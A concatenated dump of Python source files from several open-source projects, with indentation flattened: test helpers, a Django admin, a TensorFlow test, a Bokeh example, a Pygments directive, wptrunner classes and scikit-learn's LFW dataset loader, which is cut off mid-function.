for state in (True, False):
gc.enable()
set_gc_state(state)
assert_equal(gc.isenabled(), state)
gc.disable()
set_gc_state(state)
assert_equal(gc.isenabled(), state)
finally:
if gc_status:
gc.enable()
def test_gc_state():
# Test gc_state context manager
gc_status = gc.isenabled()
try:
for pre_state in (True, False):
set_gc_state(pre_state)
for with_state in (True, False):
# Check the gc state is with_state in with block
with gc_state(with_state):
assert_equal(gc.isenabled(), with_state)
# And returns to previous state outside block
assert_equal(gc.isenabled(), pre_state)
# Even if the gc state is set explicitly within the block
with gc_state(with_state):
assert_equal(gc.isenabled(), with_state)
set_gc_state(not with_state)
assert_equal(gc.isenabled(), pre_state)
finally:
if gc_status:
gc.enable()
def test_assert_deallocated():
# Ordinary use
class C(object):
def __init__(self, arg0, arg1, name='myname'):
self.name = name
for gc_current in (True, False):
with gc_state(gc_current):
# We are deleting from with-block context, so that's OK
with assert_deallocated(C, 0, 2, 'another name') as c:
assert_equal(c.name, 'another name')
del c
# Or not using the thing in with-block context, also OK
with assert_deallocated(C, 0, 2, name='third name'):
pass
assert_equal(gc.isenabled(), gc_current)
@raises(ReferenceError)
def test_assert_deallocated_nodel():
class C(object):
pass
# Need to delete after using if in with-block context
with assert_deallocated(C) as c:
pass
@raises(ReferenceError)
def test_assert_deallocated_circular():
class C(object):
def __init__(self):
self._circular = self
# Circular reference, no automatic garbage collection
with assert_deallocated(C) as c:
del c
@raises(ReferenceError)
def test_assert_deallocated_circular2():
class C(object):
def __init__(self):
self._circular = self
# Still circular reference, no automatic garbage collection
with assert_deallocated(C):
pass
| bsd-3-clause |
mythmon/wok | wok/util.py | 11 | 1471 | import re
from unicodedata import normalize
from datetime import date, time, datetime, timedelta
def chunk(li, n):
"""Yield succesive n-size chunks from l."""
for i in xrange(0, len(li), n):
yield li[i:i+n]
def date_and_times(meta):
date_part = None
time_part = None
if 'date' in meta:
date_part = meta['date']
if 'time' in meta:
time_part = meta['time']
if 'datetime' in meta:
if date_part is None:
if isinstance(meta['datetime'], datetime):
date_part = meta['datetime'].date()
elif isinstance(meta['datetime'], date):
date_part = meta['datetime']
if time_part is None and isinstance(meta['datetime'], datetime):
time_part = meta['datetime'].time()
if isinstance(time_part, int):
seconds = time_part % 60
minutes = (time_part / 60) % 60
hours = (time_part / 3600)
time_part = time(hours, minutes, seconds)
meta['date'] = date_part
meta['time'] = time_part
if date_part is not None and time_part is not None:
meta['datetime'] = datetime(date_part.year, date_part.month,
date_part.day, time_part.hour, time_part.minute,
time_part.second, time_part.microsecond, time_part.tzinfo)
elif date_part is not None:
meta['datetime'] = datetime(date_part.year, date_part.month, date_part.day)
else:
meta['datetime'] = None
| mit |
akrzos/cfme_tests | sprout/appliances/admin.py | 2 | 7301 | # -*- coding: utf-8 -*-
from functools import wraps
from celery import chain
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.db.models.query import QuerySet
from django_object_actions import DjangoObjectActions
# Register your models here.
from appliances.models import (
Provider, Template, Appliance, Group, AppliancePool, DelayedProvisionTask,
MismatchVersionMailer, UserApplianceQuota, User, BugQuery)
from appliances import tasks
from sprout.log import create_logger
def action(label, short_description):
"""Shortcut for actions"""
def g(f):
@wraps(f)
def processed_action(self, request, objects):
if not isinstance(objects, QuerySet):
objects = [objects]
return f(self, request, objects)
processed_action.label = label
processed_action.short_description = short_description
return processed_action
return g
def register_for(model, reregister=False):
def f(modeladmin):
if reregister:
admin.site.unregister(model)
admin.site.register(model, modeladmin)
return modeladmin
return f
class Admin(DjangoObjectActions, admin.ModelAdmin):
@property
def logger(self):
return create_logger(self)
@register_for(DelayedProvisionTask)
class DelayedProvisionTaskAdmin(Admin):
pass
@register_for(Appliance)
class ApplianceAdmin(Admin):
objectactions = ["power_off", "power_on", "suspend", "kill"]
actions = objectactions
list_display = [
"name", "owner", "template", "appliance_pool", "ready", "show_ip_address", "power_state"]
readonly_fields = ["owner"]
@action("Power off", "Power off selected appliance")
def power_off(self, request, appliances):
for appliance in appliances:
tasks.appliance_power_off.delay(appliance.id)
self.message_user(request, "Initiated poweroff of {}.".format(appliance.name))
self.logger.info(
"User {}/{} requested poweroff of appliance {}".format(
request.user.pk, request.user.username, appliance.id))
@action("Power on", "Power on selected appliance")
def power_on(self, request, appliances):
for appliance in appliances:
task_list = [tasks.appliance_power_on.si(appliance.id)]
if appliance.preconfigured:
task_list.append(tasks.wait_appliance_ready.si(appliance.id))
else:
task_list.append(tasks.mark_appliance_ready.si(appliance.id))
chain(*task_list)()
self.message_user(request, "Initiated poweron of {}.".format(appliance.name))
self.logger.info(
"User {}/{} requested poweron of appliance {}".format(
request.user.pk, request.user.username, appliance.id))
@action("Suspend", "Suspend selected appliance")
def suspend(self, request, appliances):
for appliance in appliances:
tasks.appliance_suspend.delay(appliance.id)
self.message_user(request, "Initiated suspend of {}.".format(appliance.name))
self.logger.info(
"User {}/{} requested suspend of appliance {}".format(
request.user.pk, request.user.username, appliance.id))
@action("Kill", "Kill selected appliance")
def kill(self, request, appliances):
for appliance in appliances:
Appliance.kill(appliance)
self.message_user(request, "Initiated kill of {}.".format(appliance.name))
self.logger.info(
"User {}/{} requested kill of appliance {}".format(
request.user.pk, request.user.username, appliance.id))
def owner(self, instance):
if instance.owner is not None:
return instance.owner.username
else:
return "--- no owner ---"
def show_ip_address(self, instance):
if instance.ip_address:
return "<a href=\"https://{ip}/\" target=\"_blank\">{ip}</a>".format(
ip=instance.ip_address)
else:
return "---"
show_ip_address.allow_tags = True
show_ip_address.short_description = "IP address"
@register_for(AppliancePool)
class AppliancePoolAdmin(Admin):
objectactions = ["kill"]
actions = objectactions
list_display = [
"id", "group", "version", "date", "owner", "fulfilled", "appliances_ready",
"queued_provision_tasks", "percent_finished", "total_count", "current_count"]
readonly_fields = [
"fulfilled", "appliances_ready", "queued_provision_tasks", "percent_finished",
"current_count"]
@action("Kill", "Kill the appliance pool")
def kill(self, request, pools):
for pool in pools:
pool.kill()
self.message_user(request, "Initiated kill of appliance pool {}".format(pool.id))
self.logger.info(
"User {}/{} requested kill of pool {}".format(
request.user.pk, request.user.username, pool.id))
def fulfilled(self, instance):
return instance.fulfilled
fulfilled.boolean = True
def appliances_ready(self, instance):
return len(instance.appliance_ips)
def queued_provision_tasks(self, instance):
return len(instance.queued_provision_tasks)
def percent_finished(self, instance):
return "{0:.2f}%".format(round(instance.percent_finished * 100.0, 2))
def current_count(self, instance):
return instance.current_count
@register_for(Group)
class GroupAdmin(Admin):
pass
@register_for(Provider)
class ProviderAdmin(Admin):
readonly_fields = [
"remaining_provisioning_slots", "provisioning_load", "show_ip_address", "appliance_load"]
list_display = [
"id", "working", "num_simultaneous_provisioning", "remaining_provisioning_slots",
"provisioning_load", "show_ip_address", "appliance_load"]
def remaining_provisioning_slots(self, instance):
return str(instance.remaining_provisioning_slots)
def appliance_load(self, instance):
return "{0:.2f}%".format(round(instance.appliance_load * 100.0, 2))
def provisioning_load(self, instance):
return "{0:.2f}%".format(round(instance.provisioning_load * 100.0, 2))
def show_ip_address(self, instance):
if instance.ip_address:
return "<a href=\"https://{ip}/\" target=\"_blank\">{ip}</a>".format(
ip=instance.ip_address)
else:
return "---"
show_ip_address.allow_tags = True
show_ip_address.short_description = "IP address"
@register_for(Template)
class TemplateAdmin(Admin):
list_display = [
"name", "version", "original_name", "ready", "exists", "date", "template_group", "usable"]
@register_for(MismatchVersionMailer)
class MismatchVersionMailerAdmin(Admin):
list_display = ["provider", "template_name", "supposed_version", "actual_version", "sent"]
class UserApplianceQuotaInline(admin.StackedInline):
model = UserApplianceQuota
can_delete = False
@register_for(User, reregister=True)
class CustomUserAdmin(UserAdmin):
inlines = (UserApplianceQuotaInline, )
@register_for(BugQuery)
class BugQueryAdmin(Admin):
pass
| gpl-2.0 |
ageron/tensorflow | tensorflow/python/kernel_tests/control_flow_util_v2_test.py | 36 | 2273 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.ops.control_flow_util_v2."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.platform import test
class ControlFlowUtilV2Test(test.TestCase):
def setUp(self):
self._enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
def tearDown(self):
control_flow_util.ENABLE_CONTROL_FLOW_V2 = self._enable_control_flow_v2_old
def _create_control_flow(self, expect_in_defun):
"""Helper method for testInDefun."""
def body(i):
def branch():
self.assertEqual(control_flow_util_v2.in_defun(), expect_in_defun)
return i + 1
return control_flow_ops.cond(constant_op.constant(True),
branch, lambda: 0)
return control_flow_ops.while_loop(lambda i: i < 4, body,
[constant_op.constant(0)])
@test_util.run_in_graph_and_eager_modes
def testInDefun(self):
self._create_control_flow(False)
@function.defun
def defun():
self._create_control_flow(True)
defun()
self.assertFalse(control_flow_util_v2.in_defun())
if __name__ == "__main__":
test.main()
| apache-2.0 |
brianquinlan/learn-machine-learning | well_bouncer/well_bouncer_game.py | 1 | 5000 | # Copyright 2019 Brian Quinlan
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The game model for a game where a ball has to be kept in the air.
The same is similar to breakout except that there are no blocks to break at
the top of the screen i.e. the objective is simply to keep the ball in the air
using a paddle as long as possible.
"""
import abc
import enum
import random
from typing import Mapping, Optional
import numpy as np
def _normalize(v):
norm = np.linalg.norm(v)
if norm == 0:
return v
return v / norm
class Direction(enum.IntEnum):
"""The possible player moves."""
LEFT = 0
CENTER = 1
RIGHT = 2
class MoveMaker(abc.ABC):
@abc.abstractmethod
def make_move(self, state) -> Direction:
pass
def move_probabilities(self, state) -> Optional[Mapping[Direction, float]]:
return None
class Game:
NUM_STATES = 6
NUM_ACTIONS = 3
def __init__(self,
reward_time_multiplier=1.0,
reward_bounces_multiplier=0.0,
reward_height_multiplier=0.0,
punish_moves_multiplier=1.0):
self._ball_pos = np.array([3 + random.random() * 19, 100.0])
self._ball_v = np.array([-0.3 + random.random() * 0.6, 0.0])
self.ball_radius = 1
self._g = np.array([0.0, -0.025])
self._paddle_pos = np.array([12.5, -9.5])
self.paddle_radius = 10
self._done = False
self._score = 0
self._reward_time_multiplier = reward_time_multiplier
self._reward_bounces_multiplier = reward_bounces_multiplier
self._reward_height_multiplier = reward_height_multiplier
self._punish_moves_multiplier = punish_moves_multiplier
@property
def done(self):
return self._done
@property
def ball_x(self):
return self._ball_pos[0]
@property
def ball_y(self):
return self._ball_pos[1]
@property
def paddle_x(self):
return self._paddle_pos[0]
@property
def paddle_y(self):
return self._paddle_pos[1]
@property
def state(self):
return (
self._ball_pos[0],
self._ball_pos[1],
self._ball_v[0],
self._ball_v[1],
self._paddle_pos[0],
self._paddle_pos[1],
)
@property
def score(self):
return self._score
def _update(self):
assert not self._done
self._score += self._reward_time_multiplier
old_y = self.ball_y
self._ball_v += self._g
self._ball_pos += self._ball_v
distance = np.linalg.norm(
[self.paddle_x - self.ball_x, self.paddle_y - self.ball_y])
if distance < (self.paddle_radius + self.ball_radius):
self._score += self._reward_bounces_multiplier
n = _normalize(
[self.paddle_x - self.ball_x, self.paddle_y - self.ball_y])
self._ball_v = self._ball_v - 2 * (np.dot(self._ball_v, n)) * n
self._ball_pos += self._ball_v
if self.ball_y < self.ball_radius:
self._done = True
elif self.ball_x < self.ball_radius:
self._score += self._reward_bounces_multiplier
self._ball_v *= [-1, 1]
self._ball_pos += [self._ball_v[0], 0]
elif self.ball_x > (25 - self.ball_radius):
self._score += self._reward_bounces_multiplier
self._ball_v *= [-1, 1]
self._ball_pos += [self._ball_v[0], 0]
if self.ball_y > old_y:
self._score += (self.ball_y -
old_y) * self._reward_height_multiplier
return self.state
def move_left(self):
self._score -= self._punish_moves_multiplier
self._paddle_pos += [-2, 0]
if self._paddle_pos[0] < 0:
self._paddle_pos[0] = 0
return self._update()
def move_right(self):
self._score -= self._punish_moves_multiplier
self._paddle_pos += [2, 0]
if self._paddle_pos[0] > 25:
self._paddle_pos[0] = 25
return self._update()
def stay(self):
return self._update()
def move(self, direction: Direction):
if direction == Direction.LEFT:
self.move_left()
elif direction == Direction.CENTER:
self.stay()
elif direction == Direction.RIGHT:
self.move_right()
else:
assert "unexpected direction: %r" % (direction)
| mit |
timothydmorton/bokeh | examples/plotting/file/color_sliders.py | 24 | 5444 | from bokeh.plotting import figure, hplot, output_file, show
from bokeh.models import ColumnDataSource, LinearColorMapper, HoverTool
from bokeh.models.actions import Callback
from bokeh.models.widgets import Slider
from bokeh.io import vform
import colorsys
# for plot 2: create colour spectrum of resolution N and brightness I, return as list of decimal RGB value tuples
def generate_color_range(N, I):
HSV_tuples = [ (x*1.0/N, 0.5, I) for x in range(N) ]
RGB_tuples = map(lambda x: colorsys.hsv_to_rgb(*x), HSV_tuples)
for_conversion = []
for RGB_tuple in RGB_tuples:
for_conversion.append((int(RGB_tuple[0]*255), int(RGB_tuple[1]*255), int(RGB_tuple[2]*255)))
hex_colors = [ rgb_to_hex(RGB_tuple) for RGB_tuple in for_conversion ]
return hex_colors, for_conversion
# convert RGB tuple to hexadecimal code
def rgb_to_hex(rgb):
return '#%02x%02x%02x' % rgb
# convert hexadecimal to RGB tuple
def hex_to_dec(hex):
red = ''.join(hex.strip('#')[0:2])
green = ''.join(hex.strip('#')[2:4])
blue = ''.join(hex.strip('#')[4:6])
return (int(red, 16), int(green, 16), int(blue,16))
# plot 1: create a color block with RGB values adjusted with sliders
# initialise a white block for the first plot
x = [0]
y = [0]
red = 255
green = 255
blue = 255
hex_color = rgb_to_hex((red,green,blue))
# initialise the text color as black. This will be switched to white if the block color gets dark enough
text_color = '#000000'
# create a data source to enable refreshing of fill & text color
source = ColumnDataSource(data=dict(x = x, y = y, color = [hex_color], text_color = [text_color]))
tools1 = 'reset, save'
# create first plot, as a rect() glyph and centered text label, with fill and text color taken from source
p1 = figure(x_range=(-8, 8), y_range=(-4, 4), plot_width=600, plot_height=300, title=None, tools=tools1)
color_block = p1.rect(x='x', y='y', width=18, height=10, fill_color='color', line_color = 'black', source=source)
hex_code_text = p1.text('x', 'y', text='color', text_color='text_color', alpha=0.6667, text_font_size='36pt', text_baseline='middle', text_align='center', source=source)
# the callback function to update the color of the block and associated label text
# NOTE: the JS functions for converting RGB to hex are taken from the excellent answer
# by Tim Down at http://stackoverflow.com/questions/5623838/rgb-to-hex-and-hex-to-rgb
callback = Callback(args=dict(source=source), code="""
function componentToHex(c) {
var hex = c.toString(16);
return hex.length == 1 ? "0" + hex : hex;
}
function rgbToHex(r, g, b) {
return "#" + componentToHex(r) + componentToHex(g) + componentToHex(b);
}
var data = source.get('data');
var RS = red_slider;
var GS = green_slider;
var BS = blue_slider;
color = data['color'];
var red_from_slider = RS.get('value');
var green_from_slider = GS.get('value');
var blue_from_slider = BS.get('value');
text_color = data['text_color'];
color[0] = rgbToHex(red_from_slider, green_from_slider, blue_from_slider);
if ((red_from_slider > 127) || (green_from_slider > 127) || (blue_from_slider > 127)) {
text_color[0] = '#000000';
}
else {
text_color[0] = '#ffffff';
}
source.trigger('change');
""")
# create slider tool objects to control the RGB levels for first plot. Set callback function to allow refresh
red_slider = Slider(start=0, end=255, value=255, step=1, title="R", callback=callback)
green_slider = Slider(start=0, end=255, value=255, step=1, title="G", callback=callback)
blue_slider = Slider(start=0, end=255, value=255, step=1, title="B", callback=callback)
callback.args['red_slider'] = red_slider
callback.args['green_slider'] = green_slider
callback.args['blue_slider'] = blue_slider
# plot 2: create a color spectrum with a hover-over tool to inspect hex codes
brightness = 0.8 # at the moment this is hard-coded. Change if you want brighter/darker colors
crx = list(range(1,1001)) # the resolution is 1000 colors
cry = [ 5 for i in range(len(crx)) ]
crcolor, crRGBs = generate_color_range(1000,brightness) # produce spectrum
# make data source object to allow information to be displayed by hover tool
crsource = ColumnDataSource(data=dict(x = crx, y = cry, crcolor = crcolor, RGBs = crRGBs))
tools2 = 'reset, save, hover'
# create second plot
p2 = figure(x_range=(0,1000), y_range=(0,10), plot_width=600, plot_height=150, tools=tools2, title = 'hover over color')
color_range1 = p2.rect(x='x', y='y', width=1, height=10, color='crcolor', source=crsource)
# set up hover tool to show color hex code and sample swatch
hover = p2.select(dict(type=HoverTool))
hover.tooltips = [
('color', '$color[hex, rgb, swatch]:crcolor'),
('RGB levels', '@RGBs')
]
# get rid of axis details for cleaner look
p1.ygrid.grid_line_color = None
p1.xgrid.grid_line_color = None
p1.axis.axis_line_color = None
p1.axis.major_label_text_color = None
p1.axis.major_tick_line_color = None
p1.axis.minor_tick_line_color = None
p2.ygrid.grid_line_color = None
p2.xgrid.grid_line_color = None
p2.axis.axis_line_color = None
p2.axis.major_label_text_color = None
p2.axis.major_tick_line_color = None
p2.axis.minor_tick_line_color = None
layout = hplot(
vform(red_slider, green_slider, blue_slider),
vform(p1, p2)
)
output_file("color_sliders.html")
show(layout)
| bsd-3-clause |
xiangel/hue | desktop/core/ext-py/Pygments-1.3.1/external/rst-directive.py | 47 | 2597 | # -*- coding: utf-8 -*-
"""
The Pygments reStructuredText directive
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This fragment is a Docutils_ 0.5 directive that renders source code
(to HTML only, currently) via Pygments.
To use it, adjust the options below and copy the code into a module
that you import on initialization. The code then automatically
registers a ``sourcecode`` directive that you can use instead of
normal code blocks like this::
.. sourcecode:: python
My code goes here.
If you want to have different code styles, e.g. one with line numbers
and one without, add formatters with their names in the VARIANTS dict
below. You can invoke them instead of the DEFAULT one by using a
directive option::
.. sourcecode:: python
:linenos:
My code goes here.
Look at the `directive documentation`_ to get all the gory details.
.. _Docutils: http://docutils.sf.net/
.. _directive documentation:
http://docutils.sourceforge.net/docs/howto/rst-directives.html
:copyright: Copyright 2006-2010 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
# Options
# ~~~~~~~
# Set to True if you want inline CSS styles instead of classes
INLINESTYLES = False
from pygments.formatters import HtmlFormatter
# The default formatter
DEFAULT = HtmlFormatter(noclasses=INLINESTYLES)
# Add name -> formatter pairs for every variant you want to use
VARIANTS = {
# 'linenos': HtmlFormatter(noclasses=INLINESTYLES, linenos=True),
}
from docutils import nodes
from docutils.parsers.rst import directives, Directive
from pygments import highlight
from pygments.lexers import get_lexer_by_name, TextLexer
class Pygments(Directive):
""" Source code syntax hightlighting.
"""
required_arguments = 1
optional_arguments = 0
final_argument_whitespace = True
option_spec = dict([(key, directives.flag) for key in VARIANTS])
has_content = True
def run(self):
self.assert_has_content()
try:
lexer = get_lexer_by_name(self.arguments[0])
except ValueError:
# no lexer found - use the text one instead of an exception
lexer = TextLexer()
# take an arbitrary option if more than one is given
formatter = self.options and VARIANTS[self.options.keys()[0]] or DEFAULT
parsed = highlight(u'\n'.join(self.content), lexer, formatter)
return [nodes.raw('', parsed, format='html')]
directives.register_directive('sourcecode', Pygments)
| apache-2.0 |
Tranzystorek/servo | tests/wpt/harness/wptrunner/wpttest.py | 58 | 10090 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
DEFAULT_TIMEOUT = 10 # seconds
LONG_TIMEOUT = 60 # seconds
import os
import mozinfo
from wptmanifest.parser import atoms
atom_reset = atoms["Reset"]
enabled_tests = set(["testharness", "reftest", "wdspec"])
class Result(object):
def __init__(self, status, message, expected=None, extra=None):
if status not in self.statuses:
raise ValueError("Unrecognised status %s" % status)
self.status = status
self.message = message
self.expected = expected
self.extra = extra
def __repr__(self):
return "<%s.%s %s>" % (self.__module__, self.__class__.__name__, self.status)
class SubtestResult(object):
def __init__(self, name, status, message, stack=None, expected=None):
self.name = name
if status not in self.statuses:
raise ValueError("Unrecognised status %s" % status)
self.status = status
self.message = message
self.stack = stack
self.expected = expected
def __repr__(self):
return "<%s.%s %s %s>" % (self.__module__, self.__class__.__name__, self.name, self.status)
class TestharnessResult(Result):
default_expected = "OK"
statuses = set(["OK", "ERROR", "TIMEOUT", "EXTERNAL-TIMEOUT", "CRASH"])
class TestharnessSubtestResult(SubtestResult):
default_expected = "PASS"
statuses = set(["PASS", "FAIL", "TIMEOUT", "NOTRUN"])
class ReftestResult(Result):
default_expected = "PASS"
statuses = set(["PASS", "FAIL", "ERROR", "TIMEOUT", "EXTERNAL-TIMEOUT", "CRASH"])
class WdspecResult(Result):
default_expected = "OK"
statuses = set(["OK", "ERROR", "TIMEOUT", "EXTERNAL-TIMEOUT", "CRASH"])
class WdspecSubtestResult(SubtestResult):
default_expected = "PASS"
statuses = set(["PASS", "FAIL", "ERROR"])
def get_run_info(metadata_root, product, **kwargs):
return RunInfo(metadata_root, product, **kwargs)
class RunInfo(dict):
def __init__(self, metadata_root, product, debug, extras=None):
self._update_mozinfo(metadata_root)
self.update(mozinfo.info)
self["product"] = product
if debug is not None:
self["debug"] = debug
elif "debug" not in self:
# Default to release
self["debug"] = False
if extras is not None:
self.update(extras)
def _update_mozinfo(self, metadata_root):
"""Add extra build information from a mozinfo.json file in a parent
directory"""
path = metadata_root
dirs = set()
while path != os.path.expanduser('~'):
if path in dirs:
break
dirs.add(str(path))
path = os.path.split(path)[0]
mozinfo.find_and_update_from_json(*dirs)
class Test(object):
result_cls = None
subtest_result_cls = None
test_type = None
def __init__(self, url, inherit_metadata, test_metadata, timeout=DEFAULT_TIMEOUT, path=None,
protocol="http"):
self.url = url
self._inherit_metadata = inherit_metadata
self._test_metadata = test_metadata
self.timeout = timeout
self.path = path
self.environment = {"protocol": protocol, "prefs": self.prefs}
def __eq__(self, other):
return self.id == other.id
@classmethod
def from_manifest(cls, manifest_item, inherit_metadata, test_metadata):
timeout = LONG_TIMEOUT if manifest_item.timeout == "long" else DEFAULT_TIMEOUT
return cls(manifest_item.url,
inherit_metadata,
test_metadata,
timeout=timeout,
path=manifest_item.source_file.path,
protocol="https" if hasattr(manifest_item, "https") and manifest_item.https else "http")
@property
def id(self):
return self.url
@property
def keys(self):
return tuple()
def _get_metadata(self, subtest=None):
if self._test_metadata is not None and subtest is not None:
return self._test_metadata.get_subtest(subtest)
else:
return self._test_metadata
def itermeta(self, subtest=None):
for metadata in self._inherit_metadata:
yield metadata
if self._test_metadata is not None:
yield self._get_metadata()
if subtest is not None:
subtest_meta = self._get_metadata(subtest)
if subtest_meta is not None:
yield subtest_meta
def disabled(self, subtest=None):
for meta in self.itermeta(subtest):
disabled = meta.disabled
if disabled is not None:
return disabled
return None
@property
def restart_after(self):
for meta in self.itermeta(None):
restart_after = meta.restart_after
if restart_after is not None:
return True
return False
@property
def tags(self):
tags = set()
for meta in self.itermeta():
meta_tags = meta.tags
if atom_reset in meta_tags:
tags = meta_tags.copy()
tags.remove(atom_reset)
else:
tags |= meta_tags
tags.add("dir:%s" % self.id.lstrip("/").split("/")[0])
return tags
@property
def prefs(self):
prefs = {}
for meta in self.itermeta():
meta_prefs = meta.prefs
if atom_reset in prefs:
prefs = meta_prefs.copy()
del prefs[atom_reset]
else:
prefs.update(meta_prefs)
return prefs
def expected(self, subtest=None):
if subtest is None:
default = self.result_cls.default_expected
else:
default = self.subtest_result_cls.default_expected
metadata = self._get_metadata(subtest)
if metadata is None:
return default
try:
return metadata.get("expected")
except KeyError:
return default
def __repr__(self):
return "<%s.%s %s>" % (self.__module__, self.__class__.__name__, self.id)
class TestharnessTest(Test):
result_cls = TestharnessResult
subtest_result_cls = TestharnessSubtestResult
test_type = "testharness"
@property
def id(self):
return self.url
class ManualTest(Test):
test_type = "manual"
@property
def id(self):
return self.url
class ReftestTest(Test):
result_cls = ReftestResult
test_type = "reftest"
def __init__(self, url, inherit_metadata, test_metadata, references,
timeout=DEFAULT_TIMEOUT, path=None, viewport_size=None,
dpi=None, protocol="http"):
Test.__init__(self, url, inherit_metadata, test_metadata, timeout, path, protocol)
for _, ref_type in references:
if ref_type not in ("==", "!="):
raise ValueError
self.references = references
self.viewport_size = viewport_size
self.dpi = dpi
@classmethod
def from_manifest(cls,
manifest_test,
inherit_metadata,
test_metadata,
nodes=None,
references_seen=None):
timeout = LONG_TIMEOUT if manifest_test.timeout == "long" else DEFAULT_TIMEOUT
if nodes is None:
nodes = {}
if references_seen is None:
references_seen = set()
url = manifest_test.url
node = cls(manifest_test.url,
inherit_metadata,
test_metadata,
[],
timeout=timeout,
path=manifest_test.path,
viewport_size=manifest_test.viewport_size,
dpi=manifest_test.dpi,
protocol="https" if hasattr(manifest_test, "https") and manifest_test.https else "http")
nodes[url] = node
for ref_url, ref_type in manifest_test.references:
comparison_key = (ref_type,) + tuple(sorted([url, ref_url]))
if ref_url in nodes:
manifest_node = ref_url
if comparison_key in references_seen:
# We have reached a cycle so stop here
# Note that just seeing a node for the second time is not
# enough to detect a cycle because
# A != B != C != A must include C != A
# but A == B == A should not include the redundant B == A.
continue
references_seen.add(comparison_key)
manifest_node = manifest_test.manifest.get_reference(ref_url)
if manifest_node:
reference = ReftestTest.from_manifest(manifest_node,
[],
None,
nodes,
references_seen)
else:
reference = ReftestTest(ref_url, [], None, [])
node.references.append((reference, ref_type))
return node
@property
def id(self):
return self.url
@property
def keys(self):
return ("reftype", "refurl")
class WdspecTest(Test):
result_cls = WdspecResult
subtest_result_cls = WdspecSubtestResult
test_type = "wdspec"
manifest_test_cls = {"reftest": ReftestTest,
"testharness": TestharnessTest,
"manual": ManualTest,
"wdspec": WdspecTest}
def from_manifest(manifest_test, inherit_metadata, test_metadata):
test_cls = manifest_test_cls[manifest_test.item_type]
return test_cls.from_manifest(manifest_test, inherit_metadata, test_metadata)
| mpl-2.0 |
cdegroc/scikit-learn | sklearn/datasets/lfw.py | 6 | 16362 | """Loader for the Labeled Faces in the Wild (LFW) dataset
This dataset is a collection of JPEG pictures of famous people collected
over the internet, all details are available on the official website:
http://vis-www.cs.umass.edu/lfw/
Each picture is centered on a single face. The typical task is called
Face Verification: given a pair of two pictures, a binary classifier
must predict whether the two images are from the same person.
An alternative task, Face Recognition or Face Identification is:
given the picture of the face of an unknown person, identify the name
of the person by refering to a gallery of previously seen pictures of
identified persons.
Both Face Verification and Face Recognition are tasks that are typically
performed on the output of a model trained to perform Face Detection. The
most popular model for Face Detection is called Viola-Johns and is
implemented in the OpenCV library. The LFW faces were extracted by this face
detector from various online websites.
"""
# Copyright (c) 2011 Olivier Grisel <olivier.grisel@ensta.org>
# License: Simplified BSD
from os import listdir, makedirs, remove
from os.path import join, exists, isdir
import logging
import numpy as np
import urllib
from .base import get_data_home, Bunch
from ..externals.joblib import Memory
logger = logging.getLogger(__name__)
BASE_URL = "http://vis-www.cs.umass.edu/lfw/"
ARCHIVE_NAME = "lfw.tgz"
FUNNELED_ARCHIVE_NAME = "lfw-funneled.tgz"
TARGET_FILENAMES = [
'pairsDevTrain.txt',
'pairsDevTest.txt',
'pairs.txt',
]
def scale_face(face):
"""Scale back to 0-1 range in case of normalization for plotting"""
scaled = face - face.min()
scaled /= scaled.max()
return scaled
#
# Common private utilities for data fetching from the original LFW website
# local disk caching, and image decoding.
#
def check_fetch_lfw(data_home=None, funneled=True, download_if_missing=True):
"""Helper function to download any missing LFW data"""
data_home = get_data_home(data_home=data_home)
lfw_home = join(data_home, "lfw_home")
if funneled:
archive_path = join(lfw_home, FUNNELED_ARCHIVE_NAME)
data_folder_path = join(lfw_home, "lfw_funneled")
archive_url = BASE_URL + FUNNELED_ARCHIVE_NAME
else:
archive_path = join(lfw_home, ARCHIVE_NAME)
data_folder_path = join(lfw_home, "lfw")
archive_url = BASE_URL + ARCHIVE_NAME
if not exists(lfw_home):
makedirs(lfw_home)
for target_filename in TARGET_FILENAMES:
target_filepath = join(lfw_home, target_filename)
if not exists(target_filepath):
if download_if_missing:
url = BASE_URL + target_filename
logger.warn("Downloading LFW metadata: %s", url)
urllib.urlretrieve(url, target_filepath)
else:
raise IOError("%s is missing" % target_filepath)
if not exists(data_folder_path):
if not exists(archive_path):
if download_if_missing:
logger.warn("Downloading LFW data (~200MB): %s", archive_url)
urllib.urlretrieve(archive_url, archive_path)
else:
raise IOError("%s is missing" % target_filepath)
import tarfile
logger.info("Decompressing the data archive to %s", data_folder_path)
tarfile.open(archive_path, "r:gz").extractall(path=lfw_home)
remove(archive_path)
return lfw_home, data_folder_path
def _load_imgs(file_paths, slice_, color, resize):
"""Internally used to load images"""
# Try to import imread and imresize from PIL. We do this here to prevent
# the whole sklearn.datasets module from depending on PIL.
try:
try:
from scipy.misc import imread
except ImportError:
from scipy.misc.pilutil import imread
from scipy.misc import imresize
except ImportError:
raise ImportError("The Python Imaging Library (PIL)"
"is required to load data from jpeg files")
# compute the portion of the images to load to respect the slice_ parameter
# given by the caller
default_slice = (slice(0, 250), slice(0, 250))
if slice_ is None:
slice_ = default_slice
else:
slice_ = tuple(s or ds for s, ds in zip(slice_, default_slice))
